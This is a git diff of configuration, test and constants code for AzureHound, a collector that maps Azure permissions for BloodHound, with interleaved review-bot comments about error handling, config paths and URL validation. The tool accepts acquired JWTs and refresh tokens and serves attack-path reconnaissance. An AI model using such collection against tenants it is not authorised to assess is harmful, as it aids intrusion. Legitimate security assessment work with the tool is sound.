+ return func(ra models.VirtualMachineRoleAssignment) bool {
+ return path.Base(ra.RoleAssignment.Properties.RoleDefinitionId) == roleId
+ }
+}
+
+func rgRoleAssignmentFilter(roleId string) func(models.ResourceGroupRoleAssignment) bool {
+ return func(ra models.ResourceGroupRoleAssignment) bool {
+ return path.Base(ra.RoleAssignment.Properties.RoleDefinitionId) == roleId
+ }
+}
+
+func mgmtGroupRoleAssignmentFilter(roleId string) func(models.ManagementGroupRoleAssignment) bool {
+ return func(ra models.ManagementGroupRoleAssignment) bool {
+ return path.Base(ra.RoleAssignment.Properties.RoleDefinitionId) == roleId
+ }
+}
+
+func connectAndCreateClient() client.AzureClient {
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(fmt.Errorf("failed to test connections: %w", err))
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(fmt.Errorf("failed to create new Azure client: %w", err))
+ } else {
+ return azClient
+ }
+
+ panic("unexpectedly failed to create azClient without error")
+}
diff --git a/config/config.go b/config/config.go
new file mode 100644
index 0000000..dfc506a
--- /dev/null
+++ b/config/config.go
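Review bot: In `proxyDialer.Dial`, the deferred closure reads `res.Body` before the `err` from `http.ReadResponse` is checked, so a malformed or truncated proxy reply (where `res` is nil) makes the defer panic instead of returning the wrapped error. Handle the error first, then register the close: `if err != nil { conn.Close(); return nil, fmt.Errorf("unable to connect to %s: %w", addr, err) }` followed by `defer res.Body.Close()`, which also makes the second close in the non-200 branch redundant. In the same function `req.SetBasicAuth` sets the `Authorization` header, whereas proxies normally read CONNECT credentials from `Proxy-Authorization`; this should be confirmed against a proxy that requires authentication. With an `http://` proxy URL those credentials cross the network in cleartext, which deserves a line in the `--proxy` usage text.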
@@ -0,0 +1,372 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package config
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+ "runtime"
+ "strings"
+
+ config "github.com/bloodhoundad/azurehound/v2/config/internal"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+type Config = config.Config
+
+var (
+ homeDir, _ = os.UserHomeDir()
+
+ // DefaultConfigFile is the path to the default configuration file.
+ //
+ // - $HOME/.config/azurehound/config.json (Unix/Darwin)
+ // - %USERPROFILE%\.config\azurehound\config.json (Windows)
+ DefaultConfigFile = filepath.Join(homeDir, ".config", "azurehound", "config.json")
+)
+
+func SystemConfigDirs() []string {
+ prefixes := func() []string {
+ switch runtime.GOOS {
+ case "darwin":
+ return []string{"/Library/Application Support"}
+ case "linux":
+ if xdgDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgDirs != "" {
+ return strings.Split(xdgDirs, ":")
+ } else {
+ return []string{"/etc/xdg"}
+ }
+ case "windows":
+ return []string{os.Getenv("PROGRAMDATA")}
+ default:
+ panic("unsupported operating system")
+ }
+ }()
+
+ configDirs := []string{}
+ for _, dir := range prefixes {
+ path := filepath.Join(dir, "azurehound")
+ configDirs = append(configDirs, path)
+ }
+ return configDirs
+}
+
+const EnvPrefix string = "AZUREHOUND"
+
+var AzRegions = []string{
+ constants.China,
+ constants.Cloud,
+ constants.Germany,
+ constants.USGovL4,
+ constants.USGovL5,
+}
+
+var (
+ // Global Configurations
+ ConfigFile = Config{
+ Name: "config",
+ Shorthand: "c",
+ Usage: fmt.Sprintf("AzureHound configuration file (default: %s)", DefaultConfigFile),
+ Persistent: true,
+ Default: DefaultConfigFile,
+ }
+ VerbosityLevel = Config{
+ Name: "verbosity",
+ Shorthand: "v",
+ Usage: fmt.Sprintf("AzureHound verbosity level (defaults to %d) [Min: %d, Max: %d]", 0, -1, 2),
+ Persistent: true,
+ Default: 0,
+ }
+ JsonLogs = Config{
+ Name: "json",
+ Shorthand: "",
+ Usage: "Output logs as json",
+ Persistent: true,
+ Default: false,
+ }
+ JWT = Config{
+ Name: "jwt",
+ Shorthand: "j",
+ Usage: "Use an acquired JWT to authenticate into Azure",
+ Persistent: true,
+ Default: "",
+ }
+ LogFile = Config{
+ Name: "log-file",
+ Shorthand: "",
+ Usage: "Output logs to this file",
+ Persistent: true,
+ Default: "",
+ }
+ Proxy = Config{
+ Name: "proxy",
+ Shorthand: "",
+ Usage: "Sets the proxy URL for the AzureHound service",
+ Persistent: true,
+ Default: "",
+ }
+ RefreshToken = Config{
+ Name: "refresh-token",
+ Shorthand: "r",
+ Usage: "Use an acquired refresh token to authenticate into Azure",
+ Persistent: true,
+ Default: "",
+ }
+ Pprof = Config{
+ Name: "pprof",
+ Usage: "During graceful shutdown, prints the pprof profile with the provided name to stderr",
+ Persistent: true,
+ Default: "",
+ }
+
+ // Azure Configurations
+ AzAppId = Config{
+ Name: "app",
+ Shorthand: "a",
+ Usage: "The Application Id that the Azure app registration portal assigned when the app was registered.",
+ Persistent: true,
+ Default: "",
+ }
+ AzSecret = Config{
+ Name: "secret",
+ Shorthand: "s",
+ Usage: "The Application Secret that was generated for the app in the app registration portal.",
+ Persistent: true,
+ Default: "",
+ }
+ AzCert = Config{
+ Name: "cert",
+ Shorthand: "",
+ Usage: "The path to the certificate uploaded to the app registration portal.",
+ Persistent: true,
+ Default: "",
+ }
+ AzKey = Config{
+ Name: "key",
+ Shorthand: "k",
+ Usage: "The path to the key file for a certificate uploaded to the app registration portal.",
+ Persistent: true,
+ Default: "",
+ }
+ AzKeyPass = Config{
+ Name: "keypass",
+ Shorthand: "",
+ Usage: "The passphrase to use in conjuction with --key ${key file}.",
+ Persistent: true,
+ Default: "",
+ }
+ AzRegion = Config{
+ Name: "region",
+ Shorthand: "",
+ Usage: fmt.Sprintf("The region of the Azure Cloud deployment (defaults to '%s') [%s]", constants.Cloud, strings.Join(AzRegions, ", ")),
+ Persistent: true,
+ Default: constants.Cloud,
+ }
+ AzTenant = Config{
+ Name: "tenant",
+ Shorthand: "t",
+ Usage: "The directory tenant that you want to request permission from. This can be in GUID or friendly name format.",
+ Required: true,
+ Persistent: true,
+ Default: "",
+ }
+ AzAuthUrl = Config{
+ Name: "auth",
+ Shorthand: "",
+ Usage: "The Azure ActiveDirectory Authority URL.",
+ Persistent: true,
+ Default: "",
+ }
+ AzGraphUrl = Config{
+ Name: "graph",
+ Shorthand: "",
+ Usage: "The Microsoft Graph URL.",
+ Persistent: true,
+ Default: "",
+ }
+ AzMgmtUrl = Config{
+ Name: "mgmt",
+ Shorthand: "",
+ Usage: "The URL of the Azure Resource Manager.",
+ Persistent: true,
+ Default: "",
+ }
+ AzUsername = Config{
+ Name: "username",
+ Shorthand: "u",
+ Usage: "The user principal name for the Azure Portal",
+ Persistent: true,
+ Default: "",
+ }
+ AzPassword = Config{
+ Name: "password",
+ Shorthand: "p",
+ Usage: "The user's password for the Azure Portal",
+ Persistent: true,
+ Default: "",
+ }
+ AzSubId = Config{
+ Name: "subscriptionId",
+ Shorthand: "b",
+ Usage: "The subscription ID to use as a filter.",
+ Persistent: true,
+ Default: []string{},
+ }
+ AzMgmtGroupId = Config{
+ Name: "mgmtGroupId",
+ Shorthand: "m",
+ Usage: "The management group ID to use as a filter.",
+ Persistent: true,
+ Default: []string{},
+ }
+
+ // BHE Configurations
+ BHEUrl = Config{
+ Name: "instance",
+ Shorthand: "i",
+ Usage: "The BloodHound Enterprise instance URL.",
+ Persistent: true,
+ Required: true,
+ Default: "",
+ }
+
+ BHEToken = Config{
+ Name: "token",
+ Shorthand: "",
+ Usage: "The BloodHound Enterprise token.",
+ Persistent: true,
+ Required: true,
+ Default: "",
+ }
+
+ BHETokenId = Config{
+ Name: "tokenId",
+ Shorthand: "",
+ Usage: "The BloodHound Enterprise token ID.",
+ Persistent: true,
+ Required: true,
+ Default: "",
+ }
+
+ ColBatchSize = Config{
+ Name: "batchSize",
+ Shorthand: "",
+ Usage: "The number of resources to send in a single batch sent to the server.",
+ Persistent: true,
+ Required: false,
+ Default: 100,
+ MinValue: 1,
+ MaxValue: 256,
+ }
+
+ ColMaxConnsPerHost = Config{
+ Name: "maxConnsPerHost",
+ Shorthand: "",
+ Usage: "The maximum number of connections made during collection.",
+ Persistent: true,
+ Required: false,
+ Default: 20,
+ MinValue: 1,
+ MaxValue: 200,
+ }
+
+ ColMaxIdleConnsPerHost = Config{
+ Name: "maxIdleConnsPerHost",
+ Shorthand: "",
+ Usage: "The maximum number of idle connections allowed during collection.",
+ Persistent: true,
+ Required: false,
+ Default: 20,
+ MinValue: 1,
+ MaxValue: 200,
+ }
+
+ ColStreamCount = Config{
+ Name: "streamCount",
+ Shorthand: "",
+ Usage: "The number of threads to use when collecting various resources.",
+ Persistent: true,
+ Required: false,
+ Default: 25,
+ MinValue: 1,
+ MaxValue: 50,
+ }
+
+ // Command specific configurations
+ KeyVaultAccessTypes = Config{
+ Name: "access-types",
+ Shorthand: "",
+ Usage: fmt.Sprintf("Filter key vault policies by one or more access type. [%s]\n\tNote: may be used multiple times or values may be provided as comma-separated list\n", strings.Join(enums.KeyVaultAccessPolicies(), ", ")),
+ Persistent: true,
+ Default: []enums.KeyVaultAccessType{},
+ }
+
+ OutputFile = Config{
+ Name: "output",
+ Shorthand: "o",
+ Usage: "The path to the file in which to output data",
+ Persistent: true,
+ Default: "",
+ }
+
+ GlobalConfig = []Config{
+ ConfigFile,
+ VerbosityLevel,
+ JsonLogs,
+ JWT,
+ LogFile,
+ Proxy,
+ RefreshToken,
+ Pprof,
+ }
+
+ AzureConfig = []Config{
+ AzAppId,
+ AzSecret,
+ AzCert,
+ AzKey,
+ AzKeyPass,
+ AzRegion,
+ AzTenant,
+ AzAuthUrl,
+ AzGraphUrl,
+ AzMgmtUrl,
+ AzUsername,
+ AzPassword,
+ AzSubId,
+ AzMgmtGroupId,
+ }
+
+ BloodHoundEnterpriseConfig = []Config{
+ BHEUrl,
+ BHETokenId,
+ BHEToken,
+ }
+
+ CollectionConfig = []Config{
+ ColBatchSize,
+ ColMaxConnsPerHost,
+ ColMaxIdleConnsPerHost,
+ ColStreamCount,
+ }
+)
+
+func ConfigFileUsed() string {
+ return config.ConfigFileUsed()
+}
diff --git a/config/internal/config.go b/config/internal/config.go
new file mode 100644
index 0000000..5cff72f
--- /dev/null
+++ b/config/internal/config.go
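Review bot: `homeDir, _ = os.UserHomeDir()` discards the error, so when no home directory can be resolved (for example a service account without HOME or USERPROFILE) `DefaultConfigFile` becomes the relative path `.config/azurehound/config.json` and is looked up under whatever the working directory happens to be. `SystemConfigDirs` has the same shape on Windows when `PROGRAMDATA` is empty, yielding a bare `azurehound` directory. The options declared in this file include the app secret, password, tokens, proxy and authority URLs, and presumably all of them can be supplied through that file, so a config picked up from an unintended directory can redirect authentication. Only build the default when the lookup succeeds, e.g. `if dir, err := os.UserHomeDir(); err == nil && dir != "" { DefaultConfigFile = filepath.Join(dir, ".config", "azurehound", "config.json") }`, and skip empty prefixes in `SystemConfigDirs`.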
@@ -0,0 +1,157 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package internal
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+ "reflect"
+ "strings"
+
+ "github.com/spf13/cobra"
+ "github.com/spf13/pflag"
+ "github.com/spf13/viper"
+)
+
+type Config struct {
+ Name string
+ Shorthand string
+ Usage string
+ Required bool
+ Persistent bool
+ Default interface{}
+ MinValue int
+ MaxValue int
+}
+
+func (s Config) Value() interface{} {
+ switch reflect.ValueOf(s.Default).Kind() {
+ case reflect.Slice:
+ return viper.GetStringSlice(s.Name)
+ case reflect.Int:
+ return viper.GetInt(s.Name)
+ default:
+ return viper.Get(s.Name)
+ }
+}
+
+func (s Config) Set(value interface{}) {
+ viper.Set(s.Name, value)
+}
+
+type Options struct {
+ ConfigFile string
+ ConfigName string
+ ConfigType string
+ ConfigPaths []string
+ EnvPrefix string
+}
+
+func Init(cmd *cobra.Command, configs []Config) {
+ for _, config := range configs {
+ viper.SetDefault(config.Name, config.Default)
+ if cmd != nil {
+ if config.Persistent {
+ setFlag(config, cmd.PersistentFlags(), cmd.MarkPersistentFlagRequired)
+ } else {
+ setFlag(config, cmd.LocalFlags(), cmd.MarkFlagRequired)
+ }
+ }
+ }
+}
+
+func setFlag(config Config, flagSet *pflag.FlagSet, markRequired func(string) error) error {
+ switch config.Default.(type) {
+ case int:
+ flagSet.IntP(config.Name, config.Shorthand, 0, config.Usage)
+ case bool:
+ flagSet.BoolP(config.Name, config.Shorthand, false, config.Usage)
+ case []string:
+ flagSet.StringSliceP(config.Name, config.Shorthand, []string{}, config.Usage)
+ default:
+ flagSet.StringP(config.Name, config.Shorthand, "", config.Usage)
+ }
+
+ if config.Required {
+ return markRequired(config.Name)
+ } else {
+ return nil
+ }
+}
+
+func LoadValues(cmd *cobra.Command, options Options) {
+ if cmd != nil {
+ viper.BindPFlags(cmd.Flags())
+ }
+ viper.SetEnvPrefix(options.EnvPrefix)
+ viper.SetEnvKeyReplacer(strings.NewReplacer("-", "_"))
+ viper.AutomaticEnv()
+
+ if options.ConfigFile != "" {
+ // If set, ConfigFile gets the highest priority by prepending to ConfigPaths; ConfigPaths are searched
+ // in priority order from ConfigPaths[0] (highest priority) to ConfigPaths[len(ConfigPaths)-1] (lowest priority)
+ options.ConfigPaths = append([]string{filepath.Dir(options.ConfigFile)}, options.ConfigPaths...)
+ basename := filepath.Base(options.ConfigFile)
+ ext := filepath.Ext(basename)
+ if ext != "" {
+ options.ConfigType = ext[1:]
+ }
+ options.ConfigName = strings.TrimSuffix(basename, ext)
+ }
+
+ setConfigSearchPaths(options.ConfigName, options.ConfigType, options.ConfigPaths)
+
+ if err := viper.ReadInConfig(); err != nil {
+ switch err.(type) {
+ case viper.ConfigFileNotFoundError, *os.PathError:
+ fmt.Fprintf(os.Stderr, "No configuration file located at %s\n", options.ConfigFile)
+ default:
+ fmt.Fprintf(os.Stderr, "Unable to read config file: %s\n", err)
+ }
+ }
+
+ if cmd != nil {
+ // Ensure all required values that actually have been set don't return an error. (See https://github.com/spf13/viper/issues/397)
+ cmd.Flags().VisitAll(func(flag *pflag.Flag) {
+ if viper.IsSet(flag.Name) && viper.Get(flag.Name) != nil {
+ switch reflect.ValueOf(viper.Get(flag.Name)).Kind() {
+ case reflect.Slice:
+ value := strings.Join(viper.GetStringSlice(flag.Name), ",")
+ cmd.Flags().Set(flag.Name, value)
+ default:
+ cmd.Flags().Set(flag.Name, fmt.Sprintf("%v", viper.Get(flag.Name)))
+ }
+ }
+ })
+ }
+}
+
+func setConfigSearchPaths(name string, extension string, paths []string) {
+ viper.SetConfigName(name)
+ if extension != "" {
+ viper.SetConfigType(extension)
+ }
+ for _, path := range paths {
+ viper.AddConfigPath(path)
+ }
+}
+
+func ConfigFileUsed() string {
+ return viper.ConfigFileUsed()
+}
diff --git a/config/internal/config_test.go b/config/internal/config_test.go
new file mode 100644
index 0000000..d19ba48
--- /dev/null
+++ b/config/internal/config_test.go
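Review bot: `Init` throws away the error returned by `setFlag`, so if `markRequired` fails for a `Required: true` option the flag silently becomes optional and nothing is reported. `Init` has no error return, so either add one or fail loudly at registration time, e.g. `if err := setFlag(config, cmd.PersistentFlags(), cmd.MarkPersistentFlagRequired); err != nil { panic(err) }`. `LoadValues` similarly ignores the results of `viper.BindPFlags` and both `cmd.Flags().Set` calls; these should at least be written to stderr the way the config-read failure is. The `MinValue` and `MaxValue` fields on `Config` are not enforced anywhere in this file, so a doc comment should say where the bounds are checked.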
@@ -0,0 +1,99 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package internal
+
+import (
+ "testing"
+
+ "github.com/spf13/cobra"
+)
+
+var (
+ fooConfig = Config{
+ Name: "foo",
+ Shorthand: "f",
+ Usage: "configure foo",
+ Default: "foo",
+ }
+
+ barConfig = Config{
+ Name: "bar",
+ Shorthand: "b",
+ Usage: "configure bar",
+ Default: 1,
+ }
+
+ bazConfig = Config{
+ Name: "baz",
+ Usage: "configure baz",
+ Persistent: true,
+ Required: true,
+ Default: false,
+ }
+
+ cmd = cobra.Command{
+ Use: "test",
+ Run: func(cmd *cobra.Command, args []string) {},
+ }
+)
+
+func init() {
+ Init(&cmd, []Config{fooConfig, barConfig, bazConfig})
+}
+
+func TestFooConfig(t *testing.T) {
+ cmd.Execute()
+
+ if actual := fooConfig.Value(); actual != "foo" {
+ t.Errorf("got %s, want %s\n", actual, "foo")
+ }
+
+ fooConfig.Set("bar")
+
+ if actual := fooConfig.Value(); actual != "bar" {
+ t.Errorf("got %s, want %s\n", actual, "bar")
+ }
+}
+
+func TestBarConfig(t *testing.T) {
+ cmd.Execute()
+
+ if actual := barConfig.Value(); actual != barConfig.Default {
+ t.Errorf("got %v, want %v\n", actual, barConfig.Default)
+ }
+
+ barConfig.Set(2)
+
+ if actual := barConfig.Value(); actual != 2 {
+ t.Errorf("got %v, want %v\n", actual, 2)
+ }
+}
+
+func TestBazConfig(t *testing.T) {
+ cmd.Execute()
+
+ if actual := bazConfig.Value(); actual != bazConfig.Default {
+ t.Errorf("got %v, want %v\n", actual, bazConfig.Default)
+ }
+
+ bazConfig.Set(true)
+
+ if actual := bazConfig.Value(); actual != true {
+ t.Errorf("got %v, want %v\n", actual, true)
+ }
+}
diff --git a/config/utils.go b/config/utils.go
new file mode 100644
index 0000000..a7c36a1
--- /dev/null
+++ b/config/utils.go
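Review bot: The result of `cmd.Execute()` is discarded in TestFooConfig, TestBarConfig and TestBazConfig, so a failure during flag parsing or the required-flag check never reaches the test. `bazConfig` is declared `Required: true` and no arguments are set on `cmd`, so Execute may return an error before `Run` is reached; `Init` and `markRequired` are defined outside this hunk, so that is an inference. I would check the error, `if err := cmd.Execute(); err != nil { t.Fatalf("execute: %v", err) }`, and pin the arguments with `cmd.SetArgs(...)` so the tests do not depend on the test binary's own command line. The `init()` call also drops whatever `Init` returns, which hides a failed flag registration.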
@@ -0,0 +1,88 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package config
+
+import (
+ "fmt"
+ "net/url"
+
+ client "github.com/bloodhoundad/azurehound/v2/client/config"
+ config "github.com/bloodhoundad/azurehound/v2/config/internal"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/go-logr/logr"
+)
+
+var Init = config.Init
+var LoadValues = config.LoadValues
+
+func SetAzureDefaults() {
+ if AzAuthUrl.Value() == "" {
+ region := AzRegion.Value().(string)
+ url := client.AuthorityUrl(region, constants.AzureCloud().ActiveDirectoryAuthority)
+ AzAuthUrl.Set(url)
+ }
+
+ if AzGraphUrl.Value() == "" {
+ region := AzRegion.Value().(string)
+ url := client.GraphUrl(region, constants.AzureCloud().MicrosoftGraphUrl)
+ AzGraphUrl.Set(url)
+ }
+
+ if AzMgmtUrl.Value() == "" {
+ region := AzRegion.Value().(string)
+ url := client.ResourceManagerUrl(region, constants.AzureCloud().ResourceManagerUrl)
+ AzMgmtUrl.Set(url)
+ }
+}
+
+func CheckCollectionConfigSanity(log logr.Logger) {
+ useSaneIntValues(ColBatchSize, log)
+ useSaneIntValues(ColMaxConnsPerHost, log)
+ useSaneIntValues(ColMaxIdleConnsPerHost, log)
+ useSaneIntValues(ColStreamCount, log)
+}
+
+func useSaneIntValues(c config.Config, log logr.Logger) {
+ val := c.Value().(int)
+ if val < c.MinValue {
+ log.V(1).Info(fmt.Sprintf("Provided value %d for config option %s is less than minimum value %d. Using default value %d.", val, c.Name, c.MinValue, c.Default))
+ c.Set(c.Default)
+ } else if val > c.MaxValue {
+ log.V(1).Info(fmt.Sprintf("Provided value %d for config option %s is greater than maximum value %d. Using default value %d.", val, c.Name, c.MaxValue, c.Default))
+ c.Set(c.Default)
+ }
+}
+
+func ValidateURL(input string) error {
+ if parsedURL, err := url.Parse(input); err != nil {
+ return err
+ } else if parsedURL.Scheme == "" || parsedURL.Host == "" {
+ return fmt.Errorf("invalid URL")
+ } else {
+ return nil
+ }
+}
+
+func Options() config.Options {
+ return config.Options{
+ ConfigFile: ConfigFile.Value().(string),
+ ConfigName: "config",
+ ConfigPaths: SystemConfigDirs(),
+ EnvPrefix: EnvPrefix,
+ }
+}
diff --git a/config/utils_test.go b/config/utils_test.go
new file mode 100644
index 0000000..9fafccc
--- /dev/null
+++ b/config/utils_test.go
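Review bot: `ValidateURL` accepts any input that parses with a non-empty scheme and host, so an `http://` value (or any other scheme) passes validation. Its callers are outside this hunk, but if it guards the authority, Graph or Resource Manager endpoint overrides that `SetAzureDefaults` otherwise fills in, a cleartext endpoint would carry bearer tokens and collected tenant data unencrypted. I would require TLS in the second branch, `} else if parsedURL.Scheme != "https" || parsedURL.Host == "" {`, and return a message that says why, e.g. `fmt.Errorf("invalid URL %q: https scheme and host are required", input)`. If a plain-HTTP endpoint must stay possible for lab use, make that an explicit opt-in rather than the default.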
@@ -0,0 +1,75 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package config_test
+
+import (
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/logger"
+)
+
+func TestCheckCollectionConfigSanity(t *testing.T) {
+ config.JsonLogs.Set(true)
+
+ if logr, err := logger.GetLogger(); err != nil {
+ t.Errorf("Error creating logger: %v", err)
+ } else {
+ log := *logr
+ config.CheckCollectionConfigSanity(log)
+
+ if config.ColBatchSize.Value().(int) != config.ColBatchSize.Default {
+ t.Errorf("ColBatchSize did not have the default value of %d. Actual: %d", config.ColBatchSize.Default, config.ColBatchSize.Value())
+ }
+
+ if config.ColMaxConnsPerHost.Value().(int) != config.ColMaxConnsPerHost.Default {
+ t.Errorf("ColMaxConnsPerHost did not have the default value of %d. Actual: %d", config.ColMaxConnsPerHost.Default, config.ColMaxConnsPerHost.Value())
+ }
+
+ if config.ColMaxIdleConnsPerHost.Value().(int) != config.ColMaxIdleConnsPerHost.Default {
+ t.Errorf("ColMaxIdleConnsPerHost did not have the default value of %d. Actual: %d", config.ColMaxIdleConnsPerHost.Default, config.ColMaxIdleConnsPerHost.Value())
+ }
+
+ if config.ColStreamCount.Value().(int) != config.ColStreamCount.Default {
+ t.Errorf("ColStreamCount did not have the default value of %d. Actual: %d", config.ColStreamCount.Default, config.ColStreamCount.Value())
+ }
+ }
+}
+
+func TestCheckCollectionConfigSanityOutOfBounds(t *testing.T) {
+ config.JsonLogs.Set(true)
+
+ if logr, err := logger.GetLogger(); err != nil {
+ t.Errorf("Error creating logger: %v", err)
+ } else {
+ log := *logr
+
+ config.ColBatchSize.Set(9999)
+ config.ColMaxConnsPerHost.Set(-9999)
+
+ config.CheckCollectionConfigSanity(log)
+
+ if config.ColBatchSize.Value().(int) != config.ColBatchSize.Default {
+ t.Errorf("ColBatchSize should have reverted to the default value of %d. Actual: %d", config.ColBatchSize.Default, config.ColBatchSize.Value())
+ }
+
+ if config.ColMaxConnsPerHost.Value().(int) != config.ColMaxConnsPerHost.Default {
+ t.Errorf("ColMaxConnsPerHost should have reverted to the default value of %d. Actual: %d", config.ColMaxConnsPerHost.Default, config.ColMaxConnsPerHost.Value())
+ }
+ }
+}
diff --git a/constants/environments.go b/constants/environments.go
new file mode 100644
index 0000000..12395c3
--- /dev/null
+++ b/constants/environments.go
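Review bot: TestCheckCollectionConfigSanityOutOfBounds hard-codes `9999` and `-9999` as the out-of-range inputs, so it only exercises the clamp while those literals stay outside limits that are declared elsewhere. If the ColBatchSize maximum is ever raised above 9999, the test stops covering the upper bound without failing for the right reason. Deriving the inputs from the limits keeps it honest: `config.ColBatchSize.Set(config.ColBatchSize.MaxValue + 1)` and `config.ColMaxConnsPerHost.Set(config.ColMaxConnsPerHost.MinValue - 1)`. Both tests also leave `JsonLogs` set to true on the shared package state; restoring it with `t.Cleanup` would stop that leaking into other tests in the package.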
@@ -0,0 +1,71 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package constants
+
+// Azure deployment regions
+const (
+ China string = "china"
+ Cloud string = "cloud"
+ Germany string = "germany"
+ USGovL4 string = "usgovl4"
+ USGovL5 string = "usgovl5"
+)
+
+type Environment struct {
+ ActiveDirectoryAuthority string
+ MicrosoftGraphUrl string
+ ResourceManagerUrl string
+}
+
+func AzureCloud() Environment {
+ return Environment{
+ "https://login.microsoftonline.com",
+ "https://graph.microsoft.com",
+ "https://management.azure.com",
+ }
+}
+
+func AzureUSGovernment() Environment {
+ return Environment{
+ "https://login.microsoftonline.us",
+ "https://graph.microsoft.us",
+ "https://management.usgovcloudapi.net",
+ }
+}
+
+func AzureUSGovernmentL5() Environment {
+ env := AzureUSGovernment()
+ env.MicrosoftGraphUrl = "https://dod-graph.microsoft.us"
+ return env
+}
+
+func AzureChina() Environment {
+ return Environment{
+ "https://login.chinacloudapi.cn",
+ "https://microsoftgraph.chinacloudapi.cn",
+ "https://management.chinacloudapi.cn",
+ }
+}
+
+func AzureGermany() Environment {
+ return Environment{
+ "https://login.microsoftonline.de",
+ "https://graph.microsoft.de",
+ "https://management.microsoftazure.de",
+ }
+}
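Review bot: The `Environment` literals in AzureCloud, AzureUSGovernment, AzureChina and AzureGermany are positional, so which host is the login authority and which is the Graph or Resource Manager endpoint depends purely on the field order of the struct. All three fields are strings, so reordering or inserting a field would compile cleanly and silently point token requests at the wrong host. Keyed literals remove that risk, e.g. `ActiveDirectoryAuthority: "https://login.microsoftonline.com",` followed by `MicrosoftGraphUrl: "https://graph.microsoft.com",` and `ResourceManagerUrl: "https://management.azure.com",`. A doc comment on `Environment` and on each constructor naming the cloud it describes would also help, since these are exported.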
diff --git a/constants/misc.go b/constants/misc.go
new file mode 100644
index 0000000..c90648d
--- /dev/null
+++ b/constants/misc.go
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package constants
+
+import "fmt"
+
+// AzureHound version
+// This gets populated at build time when the command being run uses the following flag:
+// -ldflags "-X github.com/bloodhoundad/azurehound/v2/constants.Version=`git describe --tags --exact-match 2> /dev/null || git rev-parse HEAD`"
+var Version string = "v0.0.0"
+
+const (
+ Name string = "azurehound"
+ DisplayName string = "AzureHound"
+ Description string = "The official tool for collecting Azure data for BloodHound and BloodHound Enterprise"
+ AuthorRef string = "Created by the BloodHound Enterprise team - https://bloodhoundenterprise.io"
+ AzPowerShellClientID string = "1950a258-227b-4e31-a9cf-717495945fc2"
+)
+
+// Returns a properly formatted value for the User-Agent header
+func UserAgent() string {
+ return fmt.Sprintf("%s/%s", Name, Version)
+}
+
+// Azure Services
+const (
+ GraphApiBetaVersion string = "beta"
+ GraphApiVersion string = "v1.0"
+)
